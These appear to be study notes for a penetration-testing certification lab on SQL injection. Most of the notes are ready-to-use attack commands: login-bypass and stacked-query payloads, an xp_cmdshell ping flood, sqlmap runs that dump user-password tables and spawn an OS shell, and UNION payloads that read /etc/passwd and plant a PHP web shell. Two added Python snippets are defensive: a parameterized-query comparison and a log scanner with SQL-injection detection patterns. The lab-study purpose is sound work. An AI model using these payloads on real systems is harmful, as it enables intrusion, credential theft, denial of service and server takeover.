- Log on without valid credentials
- Test for SQL Injection
- Create your own user account
- Create your own database
- Directory listing
- Perform Denial-of-Service attacks
- Use N-Stalker
- Use SQLMAP
From a Windows box – to test for a SQL injection login vulnerability
A. Go to the website LOGIN BOX. Type the query blah' or 1=1 -- in the Username field (as your login name) and leave the Password field empty. Press Enter to see if it logs you in.
B. To create a user in the vulnerable database, type blah';insert into login values ('tim','bingo123'); -- in the Username field and click Log in.
C. To create a database, type blah';create database mydatabase; -- in the Username field, leave the Password field empty, and click Log in.
In the above query, mydatabase is the name of the database that you are going to create using the SQL injection query.
D. To perform a DoS attack, type blah';exec master..xp_cmdshell 'ping www.website.com -l 65000 -t'; -- in the Username field, leave the Password field empty, and click Log in. In the above query, you are making the database server ping the www.website.com website via an SQL injection query: -l is the size of the buffer sent, and -t keeps pinging the specified host until stopped.
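As an added illustration (not part of the original notes), a Python/SQLite stand-in for the login box above: step A's payload logs in when the query is built by string concatenation and fails when the same query is parameterized. The table and credentials are constructed for the example.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's login table (not its real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('sam', 'test@123')")
    return conn

def rendered_sql(username, password):
    """What the concatenating version actually sends; useful when inspecting logs or tests."""
    return ("SELECT username FROM login WHERE username = '%s' AND password = '%s'"
            % (username, password))

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation. The quote in the
    username closes the literal, 'or 1=1' makes the predicate true for
    every row, and '--' comments out the password check."""
    row = conn.execute(rendered_sql(username, password)).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver passes the input as data,
    so the whole payload is compared literally against the username column."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "blah' or 1=1 --"
    print("concatenated :", login_vulnerable(db, payload, ""))     # sam
    print("parameterized:", login_parameterized(db, payload, ""))  # None
```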
Admin logins - https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
Use N-Stalker to look for vulnerabilities
From a Windows box
A. Run N-Stalker – enter the URL – try the OWASP scan – click Start scan
B. On completion of the scan, the Results Wizard appears. Select Save scan results (under Session Management Options) and Keep scan session for further analysis (under Next Steps), and click Next.
Use SQLMap to find DB info (NB: many of these commands are sensitive to spacing)
A. Assume that you are a registered user of the http://www.website.com website and you want to crack the passwords of the other users.
Open a web browser, type http://www.website.com in the address bar and press Enter. The Moviescope webpage appears; log in to Moviescope as Username: sam and Password: test@123 and click Login.
Once you are logged into the website, click the View Profile tab and make a note of the URL in the address bar of the browser.
Right-click anywhere on the webpage and click Inspect Element (Q) from the context menu as shown in the screenshot.
B. The Developer Tools section appears. Click the Console tab, type document.cookie in the lower left corner of the browser and press Enter. Select the cookie value, right-click and copy the value.
C. Open a terminal window.
D. Type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in the previous step>" --dbs and press Enter.
E. When the "Do you want to skip test payloads specific for other DBMSes" prompt appears, type Y and press Enter. When the "Do you want to include all tests for 'Microsoft SQL Server' extending provided level" prompt appears, type Y and press Enter. When the "Do you want to keep testing the others" prompt appears, type N and press Enter.
F. This will show the databases present in MS SQL Server. It also displays information about the web server operating system, the web application technology and the back-end DBMS.
G. To determine the tables associated with the website.com database, type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in the previous step>" -D <databasename> --tables and press Enter.
H. To extract column information, issue the following sqlmap query: type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in the previous step>" -D <Database name> -T <Table Name> --columns and press Enter.
I. To get all info from the User_Login table, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in step #5>" -D moviescope -T User_Login --dump and press Enter to dump the whole User_Login table content. Test the retrieved passwords on the website.
J. To open a COMMAND SHELL, type sqlmap -u "http://www.website.com/viewprofile.aspx?id=1" --cookie="<cookie value copied in the previous step>" --os-shell and press Enter.
K. From here you can type hostname or ipconfig to get details of the machine you have compromised.
https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
https://resources.infosecinstitute.com/important-sqlmap-commands/#gref
MYSQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
SQLMAP
Use Burp Suite to capture the login request
Save the login request to login.req
sqlmap -r login.req --level 5
Search for databases
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs
Check the privileges of the users in the database
sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --privileges
Read a file from the web server
sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch
Dump usernames and passwords
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5
Dump tables
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname --tables --dump
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname -T tablename --dump
Automated shell
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell
sqlmap -u "http://10.1.1.1/login.php" --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch
sqlmap -l trace.txt --dbs (RDBMS enumeration)
sqlmap -l trace.txt -D <db> --tables (dump tables)
sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)
Crawl links
sqlmap -u "http://192.168.1.1" --crawl=1
sqlmap -u "http://192.168.1.1" --forms --batch --crawl=5 --cookie=jsessionid=1234 --level=5 --risk=3
Manual SQL injection commands
Check for an SQLi vulnerability
?id=1'
Find the number of columns
?id=1 order by 9 -- -
Find which column is echoed to the page
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
Get the username of the SQL user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
Get the version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
Get content from the users table, from the columns name and password. (The 0x3a only serves to create a ':' delimiter between name and password.)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read a file
?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -
?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -
Create a file and read it back to check that it was really created
?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]) ?>',6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -
Then go to the browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
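From the defender's side, the manual payloads above leave distinctive strings in web-server access logs. As an added example (not part of the original notes), this Python scanner URL-decodes the request path of each log line and flags the patterns those payloads use; the log lines are constructed and the pattern names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payloads listed in these notes, matched
# case-insensitively against the URL-decoded request path and query string.
SQLI_PATTERNS = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "file_read": re.compile(r"load_file\s*\(", re.I),
    "file_write": re.compile(r"into\s+(out|dump)file", re.I),
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "stacked_cmdshell": re.compile(r";\s*exec\s+master\.\.xp_cmdshell", re.I),
    "order_by_probe": re.compile(r"order\s+by\s+\d+\s*--", re.I),
}

# Common Log Format: client ident user [timestamp] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_request(path):
    """Return the names of every pattern that fires on a request path."""
    decoded = unquote_plus(unquote_plus(path))  # twice, to catch double-encoding (%2527)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (client_ip, raw_path, hits) for each request matching at least one pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line; skip rather than crash
        ip, _method, path, _status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((ip, path, hits))
    return findings

# Constructed sample access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%20order%20by%209%20--%20- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=1%20union%20select%201,2,3,4,table_name,6,7,8,9%20from%20information_schema.tables%20--%20- HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?id=1%20union%20select%201,2,3,4,load_file(%27/etc/passwd%27),6,7,8,9%20--%20- HTTP/1.1" 200 3072',
    '203.0.113.5 - - [10/Oct/2023:13:55:58 +0000] "GET /index.php?id=1%20union%20select%201,2,3,4,%27x%27,6,7,8,9%20into%20outfile%20%27/var/www/test%27%20--%20- HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /login.aspx?user=blah%27%20or%201%3D1%20-- HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, ",".join(hits), path)
```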
https://jensoroger.wordpress.com/2019/02/28/ceh-practical-lpt-master-ctf-notes-in-general/